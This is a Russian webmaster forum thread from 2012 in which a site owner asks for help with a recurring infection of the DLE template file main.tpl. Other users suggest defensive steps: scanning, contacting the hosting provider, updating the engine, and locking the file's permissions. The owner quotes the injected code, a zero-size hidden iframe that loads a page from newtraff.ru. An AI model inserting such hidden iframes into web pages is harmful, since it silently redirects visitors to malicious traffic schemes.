|
Вредоностный код понизил посещалку
|
|
Вторник, 11.12.2012, 16:24
Проверенный
Недавно начало всплывать при загрузке сайта, загрузка какого-то файла, на какую страничку не перейдёшь высвечивается это окошко с загрузкой...
Нашёл в файле main.tpl вот такой айфрейм код с этой же загрузкой...
<iframe src="http://newtraff.ru/go.php?sid=3" width="0" height="0" frameborder="0"></iframe>
удалил, он правда пропал, но не надолго!
Что делать уже не знаю и пароли попоменял и всё проверил, вобщем хз как с ним бароться! Мало того ещё походу из-за него посещалка начала падать.
Есть проблема ещё с одним моим сайтом: перехожу на сайт, а антивирус ругается, блокирует сайт полностью, что делать? |
|
Вторник, 11.12.2012, 17:04
Проверенный
| Где именно поменяли пароли? В ftp меняли? Проверяли сайт на лишние файлы? |
|
Вторник, 11.12.2012, 19:26
Проверенный
| да и в фтп менял и от админки менял и в файлах лишнии коды искал... |
|
Вторник, 11.12.2012, 20:33
Проверенный
| а движок у тя лицензионный или нет? |
|
Вторник, 11.12.2012, 21:10
Проверенный
| Антивирусом проверяйся. Может keylogger подсунули. |
|
Проверенный
У меня тоже ощущение, что кто-то без вашего ведома получил доступ к сайту и загружает свою гадость. Просканируйте комп, просмотри логи доступа к админке если таковые имеются. Можно и к супорту хостинга обратиться для того, чтобы они помогли вам разобраться с проблемой.
p.s. Большая к вам просьба - разобравшись в этой истории, отпишитесь пожалуйста здесь. Интересно откуда у вас этот код появился. Спасибо и удачи  |
|
Пользователь
|
Проверенный
Rap4ik, до прошлого месяца движок был не лицензионный да ещё и старый DLE 8.5, уже как раз этот </iframe> код подгружался на сайте, долго не думая и уже как бы давно хотел обновить движок, обновил купил лицуху... Да толку, как подгружался на сайт так и досихпор!
woo-seo,kikoza13 комп тремя антивирусами просканировал: авастом, касперычем и доктором вебом и сайт тоже просканировал! Ничего не нашёл  |
|
Проверенный
| А что за хостинг? Сколько в месяц платите? |
|
Проверенный
|
Проверенный
| советую обратиться в хост, т.к. другой причины я не вижу или же может от шаблона? |
|
Проверенный
[quote=DEN35709]kikoza13 комп тремя антивирусами просканировал: авастом, касперычем и доктором вебом и сайт тоже просканировал! Ничего не нашёл [/quote]
Ну в таком случае, как я и писал выше, обратитесь в тех.поддержку самого хостинга. Уверен, что они быстро разберутся с вашей проблемой. |
|
Проверенный
| Rap4ik, kikoza13, не знаю помогут ли... |
|
Четверг, 13.12.2012, 02:19
Проверенный
[quote=DEN35709]kikoza13, не знаю помогут ли...[/quote]
А почему нет? Напиши им нормально, чётко изложи проблему и попроси помочь. Я более чем уверен в том, что тебе помогут. Намекни аккуратно, что тебе нет смысла платить за хостинг если с сайтом такая ерунда. Одним словом, заставь их шевелиться )) |
|
Проверенный
Судя по всему, кто то пользуется дыркой на вашем сайте, налицо признаки Simple TDS.
Надо движок скорей всего обновлять на официальный, ну или хотя бы не нуленный. Скорей всего шелл засел в каком то файле, с злоумышленник постоянно обновляет содержимое вашего сайта.
На крайний случай, если обновление невозможно, зайдите на сервер под root-ом, и поставьте на файл main.tpl пользователя root. В этом случае злодей не сможет скорей всего заменить его содержимое.
Даже вы не сможете скорей всего из админки отредактировать шаблон. Ну или попробуйте поставить на него права 444, однако в этом случае он может не открываться. Поэтому попробуйте оба варианта.
Если не помогут, тогда только искать дырку, или обновить движок. |
От плюсов не отказываюсь!!! =)
Мой Блог: seo-site.pro
Пиломатериалы в Харькове: pilorama.kh.ua |
|
